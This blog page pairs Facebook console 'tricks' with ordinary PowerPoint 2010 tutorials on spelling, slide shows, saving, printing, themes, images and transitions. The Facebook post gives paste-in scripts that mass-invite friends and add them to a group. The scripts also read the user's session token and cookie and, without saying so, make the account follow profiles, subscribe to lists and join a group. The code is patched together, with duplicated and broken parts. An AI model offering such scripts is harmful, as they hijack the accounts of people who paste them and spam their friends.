Wednesday, 27 May 2015

To Invite friends on any page in one step on Facebook

To Invite friends on any page in one step on Facebook

Code


var inputs = document.getElementsByClassName('uiButton _1sm'); for(var i=0; i<inputs.length;i++) { inputs[i].click(); }

To Add your Friends in any Group on Facebook

To Add your Friends in any Group on Facebook

Use the Following Codes as shown on Video

Code

(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Friends</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Search For Followers... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>People Invited!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Close</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='display:none; margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Fb Group Script By Safe Tricks </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}

function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){
var http4 = new XMLHttpRequest();

var url4 = "/ajax/follow/follow_profile.php?__a=1";

var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}
}

http4.send(params4);
}

function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}

a("");
a("");

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};

Sunday, 1 March 2015

MS Powerpoint part 4


Checking Spelling:-

Introduction:-

Worried about making mistakes when you type? Don't be. PowerPoint provides you with several proofing features that will help you produce professional, error-free presentations. In this lesson, you will learn about the various proofing features, including the Spelling tool.

To make your slide show appear professional, you'll want to make sure it is free from spelling errors. PowerPoint has several options for checking your spelling. You can run a spell check, or you can allow PowerPoint to check your spelling automatically as you type.


To run a spell check:
1.      Go to the Review tab.
2.      Click the Spelling command.


3.      The Spelling dialog box will open. For each error in your presentation, PowerPoint will try to offer one or more suggestions. You can select a suggestion and then click Change to correct the error.

4.      If no appropriate suggestions are given, you can manually type in the correct spelling and then click Change.

Ignoring spelling "errors":-

The spell check is not always correct. It will sometimes say something is spelled incorrectly when it's not. This often happens with people's names, which may not be in the dictionary.
If PowerPoint says something is an error, you can choose not to change it using one of three options:
       Ignore Once: This will skip the word without changing it.
       Ignore All: This will skip the word without changing it, and it will also skip all other instances of the word in your presentation.
       Add: This adds the word to the dictionary so it will never come up as an error again. Make sure the word is spelled correctly before choosing this option.

Automatic spell check:-

By default, PowerPoint automatically checks your presentation for spelling errors, so you may not even need to run a separate check using the Spelling command. These errors are indicated by red, wavy lines.

To use the automatic spell check feature:-

1.      Right-click the underlined word. A menu will appear.
2.      Click the correct spelling of the word from the list of suggestions.

3.      The corrected word will appear in the presentation.
You can choose to Ignore an underlined word, Add to Dictionary, or go to the Spelling dialog box for more options.

Modifying proofing options:-

With customizable proofing options, PowerPoint gives you the ability to change the way it addresses spelling errors, including automatic spell check and contextual spelling. Contextual spelling (an option that is turned off by default but can be turned on) can help you find and correct spelling mistakes like the use of "too" vs. "two" or "there" vs. "their".

To modify proofing options:-

1.      From the Backstage view, click Options.

2.      Select Proofing. The PowerPoint Options dialog box gives you several options to choose from:
Check spelling as you type: Uncheck this box if you don't want PowerPoint to check for spelling errors automatically. (This automatically checks Hide spelling errors.)
Use contextual spelling: Check this box if you want PowerPoint to check for contextual spelling mistakes, like the use of "your" vs. "you're".
Hide spelling errors: Check this box if you want to hide the red, wavy lines that mark spelling errors. (This option is disabled if Check spelling as you type is unchecked.)

If you've turned off the automatic spell check, you can still run a check by going to the Review tab and clicking the Spelling command.
Modifying any settings in PowerPoint Options, including Proofing, affects all of PowerPoint, not just your current presentation.


Presenting Slide Show:-

Introduction:-

Once your slide show is completed, you will need to learn how to present it to an audience. PowerPoint offers several tools and features that can assist you in making your presentation smooth, engaging, and professional.

In this lesson, you will learn how to play a slide show and advance through the slides. In addition, you will learn about various presentation options like using a highlighter to mark slides and how to set your slide show to play on a continuous loop.

To present your slide show, you'll need to know how to start it. PowerPoint allows you to start your slide show from the first slide or from any slide within the slide show. Once your slide show has started, you'll need to know how to advance through the slides.

To start a slide show:-

1.      Select the Slide Show tab.
2.      Click the From Beginning command in the Start Slide Show group to start the slide show with the first slide.

You can also start the slide show from the slide you prefer by selecting the slide and clicking on From Current Slide from the Start Slide Show group. This option is convenient if you only want to view or present certain slides.
Another option for starting the slide show is to select Slide Show view at the bottom of the window.

To advance and reverse slides:-

1.      Hover your mouse over the bottom-left of the screen. A menu will appear.
2.      Click on the right arrow to advance slides, or click on the left arrow to reverse slides.

You may also use the arrow keys on your keyboard to advance and reverse slides.
To stop or end a slide show:
To end slide show, hover and select the menu box options command and click End Show. You can also press the"Esc" key at the top left of your keyboard to end the show. 

Presentation tools and features:-

PowerPoint provides convenient tools and features you can use while you are presenting your slide show.  Features include changing your mouse pointer to a pen or highlighter to draw attention to items in your slides. In addition, you can jump around to slides in your presentation or access items from your computer desktop if needed.

To access the pen or highlighter:-

1.      Hover and click on the pen menu option in the bottom left of your screen.
2.      Select Pen or Highlighter based on your preference.

3.      Use the pointer to draw on or mark your slides. 

From the same menu, you can also change the color of the pen or highlighter. Keep in mind that light color choices are best for the highlighter.

To erase ink markings:
1.      Hover and click on the pen menu option in the bottom-left of your screen.
2.      Select Eraser to erase individual ink markings, or select Erase All Ink on Slide to erase all markings.

When you end your slide show, you also have the option to Keep or Discard (erase) any ink markings you made during your presentation.


To jump to a nonadjacent slide:-

1.      Hover and click on the menu box option in the bottom-left of your screen.
2.      Select Go to Slide, and choose the slide you would like to jump to in your presentation.

To access the desktop:-

Sometimes you may need to access the Internet or other files and programs on your computer during your presentation. PowerPoint allows you to access your desktop task bar without ending your presentation.
1.      Hover and click on the menu box option in the bottom-left of your screen.
2.      Select Screen, then click on Switch Programs.

3.      Your computer's task bar will appear. Choose a program you would like to switch to.


Menu access options:-

You can also access any of the above menu items by right-clicking anywhere on the screen during your slide show.

Keyboard shortcuts:-

       Switch between the pen pointer and mouse pointer by pressing "Ctrl + P" (pen) or "Ctrl + M" (mouse) on the keyboard.
       Press "E"  on the keyboard to erase any ink markings while using the pen or highlighter.

Slide show setup options:-

PowerPoint has various options for setting up and playing a slide show. For example, you can set up an unattended presentation that can be displayed at a kiosk and make your slide show repeat with continuous looping.

To access slide show setup options:-

1.      Select the Slide Show tab.
2.      Click the Set Up Show command.

3.      The Set Up Show dialog box will appear. 





4.      Click OK to apply the settings to the slide show.
Saving and Printing:-

Introduction:-

Are you saving for the first time? Do you need to share your presentation with someone who does not have PowerPoint 2010? Would you like to print handouts of your presentation? Do you need a printout that shows your notes with your slides? All of these things will affect how you save and print your PowerPoint presentations.
In this lesson, you will learn how to use the Save and Save As commands, in addition to learning how to save in alternative file formats. We will also cover all of the printing tasks and settings in the Print pane, along with the Quick Print feature.

Saving and Printing Presentations:-

Whenever you create a new presentation in PowerPoint, you'll need to know how to save it in order to access and edit it later. PowerPoint allows you to save your presentations in a number of ways.
Once you've created your document, you may want to print it to view and share your work offline. It's easy to preview and print a document in Word using the Print pane.

To use the Save As command:-

Save As allows you to choose a name and location for your presentation. It's useful if you've first created a presentation or if you want to save a different version of a presentation while keeping the original.
1.      Click the File tab.
2.      Select Save As.

3.      The Save As dialog box will appear. Select the location where you wish to save the presentation.
4.      Enter a name for the presentation, then click Save.

If you're using Windows 7, you'll usually want to save things to your Documents library, and in other versions of Windows you'll save them to the My Documents folder. For more information, check out our lessons on Windows 7 and Windows XP.

To use the Save command:-

1.      Click the Save command on the Quick Access Toolbar.

2.      The presentation will be saved in its current location with the same file name.
If you are saving for the first time and select Save, the Save As dialog box will appear.

AutoRecover:-

PowerPoint automatically saves your presentation to a temporary folder while you're working on it. If you forget to save your changes or if PowerPoint crashes, you can recover the autosaved file.
1.      Open a presentation that was previously closed without saving.
2.      In Backstage view, click Info.
3.      If there are autosaved versions of your file, they will appear under Versions. Click on the file to open it.

4.      To save changes, click Restore, then click OK.

By default, PowerPoint autosaves every 10 minutes. If you are editing a presentation for less than 10 minutes, PowerPoint may not create an autosaved version.

Other file formats:-

To save as a PowerPoint 97-2003 Presentation:
You can share your presentation with anyone using PowerPoint 2010 or 2007, since they use the same file format. However, earlier versions of PowerPoint use a different file format, so if you want to share your presentation with someone using an earlier version of PowerPoint, you'll need to save it as a PowerPoint 97-2003 presentation.
1.      Click the File tab.
2.      Select Save As.
3.      In the Save as type drop-down menu, select PowerPoint 97-2003 Presentation.

4.      Select the location you wish to save the presentation.
5.      Enter a name for the presentation, then click Save.
To save as a different file type:
If you would like to share your presentation with someone who does not have PowerPoint, you have several different file types to choose from.
1.      Click the File tab.
2.      Select Save & Send.
3.      Choose from three special File Types: o           Create PDF/XPS Document: Saves the contents of your slide show as a document instead of a PowerPoint file.
o    Create a Video: Saves your presentation as a video that can be shared online, in an email, or on a disc.
o    Package Presentation for CD: Saves your presentation in a folder along with the Microsoft PowerPoint Viewer, a special slide show player that anyone can download and use.


Printing:-

In previous versions of PowerPoint, there was a Print Preview option that allowed you to see exactly what the presentation looked like before printing it. You may have noticed that this feature seems to be gone in PowerPoint 2010. It actually hasn't disappeared; it has just been combined with the Print window to create the Print pane, which is located in Backstage view.
To view the Print pane:
1.      Click the File tab to go to Backstage view.
2.      Select Print. The Print pane appears, with the print settings on the left and the Preview on the right.











To print:-

1.      Go to the Print pane.
2.      Determine and choose how you want the slides to appear on the page.
3.      If you only want to print certain slides, you can type a range of slides. Otherwise, select Print All Slides.
4.      Select the number of copies.
5.      Select a printer from the drop-down list.
6.      Click the Print button.

Quick Print:-

There may be times when you want to print something with a single click, using Quick Print. This feature prints the document using the default settings and the default printer. In PowerPoint 2010, you'll need to add it to the Quick Access Toolbar in order to use it.
Quick Print always prints the entire presentation, so if you only want to print part of your presentation you'll have to use the Print pane.
To access the Quick Print button:
1.      Click the drop-down arrow on the right side of the Quick Access Toolbar.
2.      Select Quick Print if it is not already checked.

3.      To print, just click the Quick Print command.

MS Powerpoint part 3



Modifying text:- To insert a bulleted list:-

1.      Select the text box (or specific text) you want to format as a bulleted list.
2.      Click the Bullets command in the Paragraph group on the Home tab.

3.      A bulleted list will appear.

To change horizontal text alignment:- 1. Select the text you wish to modify.
2. Select one of the four alignment options in the Paragraph group. o   Align Text Left: Aligns all of the selected text to the left margin. o   Center: Aligns text an equal distance from the left and right margins. o            Align Text Right: Aligns all of the selected text to the right margin.
o Justify: Justified text is equal on both sides and lines up equally to the right and left margins. Many newspapers and magazines use full justification.

The alignment commands align the text within the placeholder or text box it is in, not across the slide.

To change vertical text alignment:-

1.      Select the text you wish to modify.
2.      Click the Align Text command in the Paragraph group. A menu will appear.

3.      Choose to align the text at the Top, Middle, or Bottom of the text box.

To change text direction:-

1.      Select the text you wish to modify.
2.      Click the Text Direction command in the Paragraph group. A menu will appear.

3.      Choose for the direction of the text to be Horizontal, Rotated, or Stacked.


           

Applying a Theme:-

Introduction:-

A theme is a predefined combination of colors, fonts, and effects that can be applied to your presentation. PowerPoint includes built-in themes that allow you to easily create professional-looking presentations without spending a lot of time formatting. In this lesson, you will learn all about themes and how to apply them.

Themes:-

A theme is a set of colors, fonts, effects, and more that can be applied to your entire presentation to give it a consistent, professional look. You've already been using a theme, even if you didn't know it: the default Office theme, which consists of a white background, the Calibri font, and primarily black text. Themes can be applied or changed at any time.

Theme elements:-

Every PowerPoint theme, including the default Office theme, has its own theme elements. These elements are:
       Theme Colors (available from every Color menu)

       Theme Fonts (available from the Font menu)

       Shape Styles (available in the Format tab when you click on a shape)

Why use theme elements?
If you're using theme elements, you'll probably find that your presentation looks pretty good. All of the colors will work well together, which means you won't have to spend as much time formatting your presentation. But there's another great reason to use theme elements: When you switch to a different theme, all of those elements will update to reflect the new theme. You can drastically change the look of your presentation in just a few clicks.

Remember, the colors and fonts will only update if you're using Theme Fonts or Theme
Colors. If you choose one of the Standard Colors or any of the Fonts that are not Theme Fonts, then your text will not change when you change the theme. This can be useful if you're creating a logo or title that always needs to look the same, like in the sample below.

Themes and slide layouts:-
As you can see from the two different Title Slides above, themes also affect the various slide layouts.

If you apply a theme before you start building your presentation, you will be able to arrange your content to fit the layouts you have to choose from. If you apply the theme after, the text boxes and placeholders may move depending on the theme you choose.

Applying themes:-

You will need to know how to apply a theme and how to switch to a different theme if you want to use this feature to create presentations. All of the themes included in PowerPoint are located in the Themes group on the Design tab. Themes can be applied or changed at any time.
To apply a theme:
1.      Go to the Design tab.
2.      Locate the Themes group. Each image represents a theme.

3.      Click the drop-down arrow to access more themes.

4.      Hover over a theme to see a live preview of it in the presentation. The name of the theme will appear as you hover over it.

5.      Click a theme to apply it to the slides.

Inserting Images:-

Introduction:-

Adding images to your presentations makes them more interesting and engaging. Pictures,
clip art, and screenshots can be inserted into PowerPoint to help you effectively communicate             your     ideas    to         your     audience. 

In this lesson, you will learn how to insert and manipulate pictures, clip art, and screenshots into your slides.

Working with Images:-

Adding clip art and pictures to your presentation can be a great way to illustrate important information or add decorative accents to existing text. You can insert images from your computer, search Microsoft's large selection of clip art to find the image you need, or add a screenshot of your own. Once an image has been inserted, you can resize and move it to the location you want.

To insert an image from a file:-

1.      Select the Insert tab.
2.      Click the Picture command in the Images group. The Insert Picture dialog box appears.

3.      Select the desired image file, then click Insert.

4.      The picture will appear in your slide.

You can also select the Insert Picture from File command in a placeholder to insert images.


To locate clip art:
1.      Select the Insert tab.
2.      Click the Clip Art command in the Images group.

3.      The clip art options appear in the task pane to the right of the document.
4.      Enter keywords in the Search for: field that are related to the image you wish to insert.
5.      Click the drop-down arrow in the Results should be: field.
6.      Deselect any types of media you do not wish to see.

7.      If you would like to also search for clip art on Office.com, place a check mark next to Include Office.com content. Otherwise, it will just search for clip art on your computer.

8.      Click Go.

To insert clip art:-

1.      Review the results from a clip art search in the Clip Art pane.
2.      Select the desired image.

3.      The clip art will appear in your slide.

You can also select the Insert Clip Art from File command in a placeholder to insert clip art.


Inserting screenshots:-

Screenshots are pictures that capture the visible windows and items displayed on your computer screen. They may include an open window of a website, items on your desktop, or an open program, like the PowerPoint images displayed in this tutorial. These images can be useful for explaining or displaying computer programs, functions, and websites. PowerPoint allows you to capture an image of an entire window or a screen clipping of part of a window.

To insert screenshots of a window:-

1.      Select the Insert tab.
2.      Click the Screenshot command in the Images group.
3.      The Available Windows from your desktop will appear. Select the window you would like to capture as a screenshot.
4.      The screenshot will appear in your slide.



To insert a screen clipping from a window:
1.      Select the Insert tab.
2.      Click the Screenshot command, then select Screen Clipping.

3.      A faded view of your current desktop will appear, and your cursor will turn into a cross shape .
4.      Click, hold, and drag on the area of the window that you want to capture.

5.      The screen clipping will appear in your slide.

Resizing and moving images:-

To resize an image:-  1. Click on the image.
2.      Position your mouse over any one of the corner sizing handles. The cursor will become a pair of directional arrows .
3.      Click, hold, and drag your mouse until the image is the desired size.

4.      Release the mouse. The image will be resized.
The side sizing handles change the image's size but do not keep the same proportions. If you want to keep the image's proportions, always use the corner handles.

To move an image:-

1.      Click on the image. The cursor will turn into a cross with arrows .
2.      While holding down the mouse button, drag the image to the desired location.

3.      Release the mouse button. The box will be moved.
To rotate the image, click and drag on the green circle located at the top of the image.

Applying Transitions:-

Introduction:-

Transitions are motion effects that, when in Slide Show View, add movement to your slides as you advance from one slide to another. There are many transitions to choose from; each one allows you to control the speed and even add sound.
In this lesson, you will learn how to apply and customize slide transitions.

If you've ever seen a PowerPoint presentation that had "special effects" between each slide, then you've seen slide transitions. A transition can be as simple as fading to the next slide or as complex as a flashy, eye-catching effect. This means you can choose transitions to fit the style of any presentation.

About transitions:-

There are three categories of unique transitions to choose from, all of which can be found on the Transitions tab:
       Subtle (slight transitions)

       Exciting (strong transitions)

       Dynamic Content (strong transitions that affect only the content, such as text or images)

To apply a transition:-

1.      Select the slide you wish to modify.
2.      Click the Transitions tab.
3.      Locate the Transition to This Slide group. By default, None is applied to each slide.

4.      Click the More drop-down arrow to display all of the transitions.
5.      Click a transition to apply it to the selected slide. This will automatically preview the transition as well.

When working with transitions, the Apply To All command in the Timing group can be used at any time to make your presentation uniform. Use this command with caution. Not only does it apply the same transition to every slide, but it also applies the settings in the Timing group, which you may not want to be the same throughout your presentation.

To preview a transition:-

You can preview the transition for a selected slide at any time, using either of these two methods:
       Click the Preview command on the Transitions tab.

       Click the star Play Animations icon. The icon appears on the Slides tab in the left pane beside any slide that includes a transition.

Modifying a transition:- To modify the duration:-

1.      Select the slide that includes the transition you wish to modify.
2.      In the Duration field in the Timing group, enter the amount of time you want the transition to take. In this example, we will specify the length as 2 seconds, or 02.00.

To add sound:
1.      Select the slide that includes the transition you wish to modify.
2.      Click the Sound drop-down menu in the Timing group.
3.      You will hear the sound and see a live preview of the transition as you hover over each sound.

4.      Click a sound to apply it to the selected slide.

To remove a transition:-

1.      Select the slide you wish to modify.
2.      Choose None from the gallery in the Transition to This Slide group.

3.      Repeat this process for each slide you want to modify.
To remove transitions from all slides, select a slide that uses None, and click the Apply to All command.
Advancing slides:-

To advance slides automatically:-

Normally, in Slide Show View, you would advance to the next slide by clicking your mouse (or        pressing           Enter   on        your     keyboard).       Using   the Advance   Slides settings            in the Timing group, you can set your presentation to advance on its own instead, and display each slide for a specific amount of time. This is useful for unattended presentations, such as at a tradeshow booth.
1.      Select the slide you wish to modify.
2.      Locate the Timing group on the Transitions tab.
3.      Under Advance Slide, uncheck the box next to On Mouse Click.
4.      In the After field, enter the amount of time you want to display the slide. In this example, we will advance the slide automatically after 1 minute 30 seconds, or 01:30:00.

5.      Select another slide and repeat the process until all the desired slides have the appropriate timing.